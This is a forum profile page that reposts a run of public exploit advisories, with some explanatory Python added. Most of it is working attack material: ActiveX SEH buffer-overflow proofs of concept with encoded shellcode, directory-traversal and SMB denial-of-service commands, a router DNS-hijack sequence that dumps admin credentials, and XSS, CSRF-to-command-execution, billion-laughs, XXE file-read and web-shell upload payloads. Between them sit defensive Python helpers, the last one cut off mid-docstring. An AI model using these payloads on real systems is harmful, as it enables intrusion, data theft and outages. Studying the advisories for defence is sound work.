
Everything posted by HireHackking
-
1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow
<html>
<br>1 Click Audio Converter Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1GmOAyq -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script>
// 2048 bytes of filler reach the SEH record on the stack
junk1 = "";
while(junk1.length < 2048) junk1+="A";
// nSEH: short jump (EB 06) over the handler address into the nop sled, plus 2 filler bytes
nseh = "\xeb\x06\x90\x90";
// SEH: handler address 0x100451D7 inside SkinCrafter.dll, written little-endian
seh = "\xD7\x51\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
// encoded shellcode
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
// junk | nSEH | SEH | nops | shellcode | junk
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
// the overlong first argument overflows the stack buffer inside InitLicenKeys
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
-
WiFi HD 8.1 - Directory Traversal / Denial of Service
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No response from the vendor. Advisory released.

Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services.

Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access.

The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when the command "dir \" is issued against the IPC$ share (for example via smbclient's -c option). It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.

Web Server Proof-of-Concept
===========================

Read arbitrary files/folders:

  Read /etc/passwd:
  curl "http://[TARGET IP]/../../../../../../../../etc/passwd"

  List contents of the /tmp directory:
  curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:

  Create the folder, "/tmp/PoC-Folder":
  curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"

Delete Files/Folders:

  Delete the folder, "/tmp/PoC-Folder":
  curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'

Upload a File:

  Upload /etc/services to /tmp/example.txt:
  curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

SMB Server Proof-of-Concept
===========================

Denial of Service:
  smbclient -N -c 'dir \' //[TARGET IP]/IPC$

Browse the iPhone's Filesystem:
  smbclient -N //[TARGET IP]/IPC$
-
1 Click Extract Audio 2.3.6 - Activex Buffer Overflow
<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1SYwV3u -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script>
// 2048 bytes of filler reach the SEH record on the stack
junk1 = "";
while(junk1.length < 2048) junk1+="A";
// nSEH: short jump (EB 06) over the handler address into the nop sled, plus 2 filler bytes
nseh = "\xeb\x06\xff\xff";
// SEH: handler address 0x1004E458 inside SkinCrafter.dll, written little-endian
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
// encoded shellcode
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
// junk | nSEH | SEH | nops | shellcode | junk
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
// the overlong first argument overflows the stack buffer inside InitLicenKeys
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
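The two SkinCrafter.dll PoCs above differ only in the nSEH filler bytes and the handler address, so the SEH layout is worth checking once in code rather than by eye. What follows is an added example, not metacom's PoC: it rebuilds the junk | nSEH | SEH | nops | shellcode | junk layout as bytes and verifies that the handler address is packed little-endian at offset 2052 and that the JMP SHORT in nSEH lands inside the nop sled. Python is used so the check runs anywhere (all added examples on this page use it); the INT3 stand-in shellcode is constructed, and the assumption that execution resumes at nSEH (a pop/pop/ret handler) is exactly what this layout needs, although the PoCs do not say what instruction lives at 0x100451D7 or 0x1004E458. SafeSEH or SEHOP on the target defeats this layout regardless of offsets.

```python
import struct

# Layout constants taken from the two PoCs above: 2048 filler bytes reach the
# SEH record; nSEH is 4 bytes (JMP SHORT + 2 filler bytes); SEH is 4 bytes.
JUNK_LEN = 2048
NOP_LEN = 50


def build_payload(seh_handler, nseh_pad=b"\x90\x90", shellcode=b"\xcc" * 4):
    """Assemble junk | nSEH | SEH | nops | shellcode | junk exactly as the PoCs do.

    seh_handler: handler address as an integer, packed little-endian.
    shellcode: defaults to a constructed INT3 stub, not the PoCs' encoded payload.
    """
    junk1 = b"A" * JUNK_LEN
    nseh = b"\xeb\x06" + nseh_pad              # JMP SHORT +6 skips the SEH address
    seh = struct.pack("<I", seh_handler)
    nops = b"\x90" * NOP_LEN
    junk2 = b"B" * JUNK_LEN
    return junk1 + nseh + seh + nops + shellcode + junk2


def seh_record(payload):
    """Return (nseh_bytes, handler_address) at the offset the overflow overwrites."""
    nseh = payload[JUNK_LEN:JUNK_LEN + 4]
    handler = struct.unpack("<I", payload[JUNK_LEN + 4:JUNK_LEN + 8])[0]
    return nseh, handler


def short_jump_target(payload):
    """Offset the JMP SHORT in nSEH lands on: next instruction + signed rel8.

    Assumes the handler is a pop/pop/ret, so execution resumes at nSEH itself.
    """
    opcode, rel8 = payload[JUNK_LEN], payload[JUNK_LEN + 1]
    if opcode != 0xEB:
        raise ValueError("nSEH does not start with JMP SHORT (EB rel8)")
    rel = struct.unpack("<b", bytes([rel8]))[0]   # rel8 is a signed displacement
    return JUNK_LEN + 2 + rel


def lands_in_nop_sled(payload):
    """True when the nSEH jump lands inside the 50-byte sled, as the PoCs need."""
    sled_start = JUNK_LEN + 8
    return sled_start <= short_jump_target(payload) < sled_start + NOP_LEN


if __name__ == "__main__":
    for handler, pad in ((0x100451D7, b"\x90\x90"), (0x1004E458, b"\xff\xff")):
        p = build_payload(handler, nseh_pad=pad)
        print(hex(handler), seh_record(p), short_jump_target(p), lands_in_nop_sled(p))
```

For both PoCs the jump resolves to offset 2056, the first byte of the sled: 2048 (nSEH) + 2 (length of the EB 06 instruction) + 6 (displacement) skips exactly the 2 filler bytes and the 4-byte handler address. Changing the displacement or the sled length breaks that arithmetic, which is what the check is for.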
-
Broadlight Residential Gateway DI3124 - Remote DNS Change
Broadlight Residential Gateway DI3124 Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg

No description for morons, script kiddies & noobs !!

Disclaimer: This and previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk!

ShodanHQ Dork:
Server: thttpd/2.25b 29dec2003
Content-Length: 348414

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?"
{"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"}, {"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)'
<username>admin</username>
<password>admin</password>
-
Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53585/info The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E
-
ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected.

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

POST parameters (name / value):
add_img_name_post                    "onmouseover=prompt(1) joxy
adresse_destinataire
adresse_expediteur                   lab%40zeroscience.mk
asciiart_post                        "onmouseover=prompt(2) joxy
expediteur                           "onmouseover=prompt(3) joxy
message                              Hello%20World
message1                             %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send                                 Send
titre_sav                            "onmouseover=prompt(4) joxy
url_sav                              http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561    "onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920    2
-
OpenKM 5.1.7 - Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/53602/info

OpenKM is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application.

OpenKM 5.1.7 is vulnerable; other versions may also be affected.

Login as administrator (having the AdminRole) and call the URL in a different browser window:

http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B

Alternatively the administrator could browse a prepared HTML page in a new tab:

<html>
<body>
<script>
img = new Image();
img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B";
</script>
</body>
</html>

The above exploit does nothing more than create a file in /tmp; decoded, the script parameter is:

String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);

Some might also want to browse directories:

http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B%0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
-
Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service
source: https://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA, are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data: nested entity declarations in the request's DTD are expanded exponentially by the parser.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:
Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Tempo versions prior to 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:authenticateApplication>
      <urn:in0>
        <aut:credential>
          <aut:credential>stuff1</aut:credential>
          <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
        </aut:credential>
        <aut:name>stuff3</aut:name>
        <aut:validationFactors>
          <aut:ValidationFactor>
            <aut:name>stuff4</aut:name>
            <aut:value>stuff5</aut:value>
          </aut:ValidationFactor>
        </aut:validationFactors>
      </urn:in0>
    </urn:authenticateApplication>
  </soapenv:Body>
</soapenv:Envelope>
-
PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/53598/info

PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHP Address Book 7.0 is vulnerable; other versions may also be affected.

http://www.example.com/addressbookv7.0.0/group.php/[XSS]
http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS]
-
Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Security
source: https://www.securityfocus.com/bid/53603/info

The FishEye and Crucible plugins for JIRA are prone to an XML external entity (XXE) vulnerability because they fail to properly handle crafted XML data: an external entity declared in the request's DTD is resolved by the parser.

Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.

FishEye and Crucible versions up to and including 2.7.11 are vulnerable.

Burp Repeater
Host: somehost.com
Port 443

POST /crowd/services/test HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 2420

<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:addAllPrincipals>
      <urn:in0>
        <!--Optional:-->
        <aut:name>?</aut:name>
        <!--Optional:-->
        <aut:token>?</aut:token>
      </urn:in0>
      <urn:in1>
        <!--Zero or more repetitions:-->
        <soap:SOAPPrincipalWithCredential>
          <!--Optional:-->
          <soap:passwordCredential>
            <!--Optional:-->
            <aut:credential>?</aut:credential>
            <!--Optional:-->
            <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential>
          </soap:passwordCredential>
          <!--Optional:-->
          <soap:principal>
            <!--Optional:-->
            <soap:ID>?</soap:ID>
            <!--Optional:-->
            <soap:active>?</soap:active>
            <!--Optional:-->
            <soap:attributes>
              <!--Zero or more repetitions:-->
              <soap:SOAPAttribute>
                <!--Optional:-->
                <soap:name>?</soap:name>
                <!--Optional:-->
                <soap:values>
                  <!--Zero or more repetitions:-->
                  <urn:string>?</urn:string>
                </soap:values>
              </soap:SOAPAttribute>
            </soap:attributes>
            <!--Optional:-->
            <soap:conception>?</soap:conception>
            <!--Optional:-->
            <soap:description>?</soap:description>
            <!--Optional:-->
            <soap:directoryId>?</soap:directoryId>
            <!--Optional:-->
            <soap:lastModified>?</soap:lastModified>
            <!--Optional:-->
            <soap:name>?</soap:name>
          </soap:principal>
        </soap:SOAPPrincipalWithCredential>
      </urn:in1>
    </urn:addAllPrincipals>
  </soapenv:Body>
</soapenv:Envelope>
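The Tempo/JIRA request and this FishEye/Crucible request are the two classic DTD abuses: nested internal entities that expand exponentially (the lol..lol9 chain) and an external entity that pulls file:///etc/passwd into the response. Any parser that expands entities will do both, so the real fix is to turn DTD processing off in the parser. Where that setting is not available, the following added example (mine, not Atlassian's code) pre-screens a document in Python before it reaches a parser: it reads the internal DTD subset, flags SYSTEM/PUBLIC entities, and computes how many bytes each internal entity would expand to. The sample documents rebuild the entity declarations from the two requests above around a reduced body; the size limit is an assumed value.

```python
import re

# Matches one <!ENTITY ...> declaration in an internal DTD subset.
# Internal entities carry a quoted value; external ones (SYSTEM/PUBLIC) a URI.
ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s>]+)\s+'
    r'(?:(?P<ext>SYSTEM|PUBLIC)\b[^>]*?"(?P<uri>[^"]*)"\s*>'
    r'|"(?P<value>[^"]*)"\s*>)',
    re.IGNORECASE | re.DOTALL)
ENTITY_REF = re.compile(r'&([^\s;&]+);')


def scan_dtd(xml_text):
    """Return (external_entities, expanded_sizes) for the document's DTD.

    external_entities: name -> URI for every SYSTEM/PUBLIC entity.
    expanded_sizes: name -> bytes the internal entity expands to, following
    nested references the way a parser would.
    """
    external, internal = {}, {}
    for m in ENTITY_DECL.finditer(xml_text):
        if m.group("ext"):
            external[m.group("name")] = m.group("uri")
        else:
            internal[m.group("name")] = m.group("value")

    sizes = {}

    def size_of(name, active):
        if name in sizes:
            return sizes[name]
        if name in active:
            raise ValueError("recursive entity " + name)   # illegal XML anyway
        value, total, pos = internal[name], 0, 0
        for ref in ENTITY_REF.finditer(value):
            total += ref.start() - pos
            target = ref.group(1)
            if target in internal:
                total += size_of(target, active | {name})
            else:
                total += len(ref.group(0))   # external or predefined: count the reference text
            pos = ref.end()
        total += len(value) - pos
        sizes[name] = total
        return total

    for name in internal:
        size_of(name, frozenset())
    return external, sizes


def reject_reason(xml_text, max_expansion=1_000_000):
    """Why the document should be refused before parsing, or None if it looks safe."""
    if "<!DOCTYPE" not in xml_text:
        return None
    external, sizes = scan_dtd(xml_text)
    if external:
        listing = ", ".join(f"{n} -> {u}" for n, u in sorted(external.items()))
        return "external entity: " + listing
    worst_name, worst_size = max(sizes.items(), key=lambda kv: kv[1], default=(None, 0))
    if worst_size > max_expansion:
        return f"entity {worst_name} expands to {worst_size} bytes"
    return None


def billion_laughs(levels=9, fanout=10):
    """Rebuild the lol..lol9 DTD from the Tempo/JIRA request above around a one-element body."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for i in range(2, levels + 1):
        decls.append(f'<!ENTITY lol{i} "{("&" + prev + ";") * fanout}">')
        prev = f"lol{i}"
    return ('<?xml version="1.0" encoding="utf-8" ?>\n<!DOCTYPE lolz [\n'
            + "\n".join(decls) + "\n]>\n<a>&" + prev + ";</a>")


# The external-entity declaration from the FishEye/Crucible request above, reduced body.
XXE_SAMPLE = ('<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]>'
              '<aut:encryptedCredential xmlns:aut="http://authentication.integration.crowd.atlassian.com">'
              '?&xxec6079;</aut:encryptedCredential>')
```

For the lol chain above the computed size of lol9 is 300,000,000 bytes from a request of about 1.5 KB, which is the whole denial of service. A regex scan is a guard, not a parser: it belongs in front of a parser that is itself configured with entity resolution and DTD loading off, not in place of that setting.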
-
Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions
source: https://www.securityfocus.com/bid/53616/info

Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.

Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected.

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------6dc3a236402e2

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>
-----------------------------6dc3a236402e2--
-
Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53622/info Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. http://www.example.com/search/?text=%27);alert(document.cookie)//
-
Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access
source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process. Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../
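Both Acuity entries above and the WiFi HD advisory earlier on this page come down to the same two server-side mistakes: a client-supplied path (`path=../../`, a URL beginning with `/../../`) is joined onto the served directory without confinement, and an uploaded filename is used as given. The following added example (not Acuity's or WiFi HD's code) shows the two checks in Python: confine a requested path lexically to a root directory, and reduce an upload name to a safe basename with an extension allowlist. The root directory and the allowlists are assumed values for the demonstration.

```python
import posixpath
import re
from urllib.parse import unquote

SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_under_root(root, requested):
    """Map a client-supplied path onto the exported directory, refusing escapes.

    root: the directory the server is meant to expose, as a POSIX path.
    requested: the raw value from the URL or form field (the WiFi HD URL path,
    Acuity's path= parameter), possibly URL-encoded, possibly starting with /.
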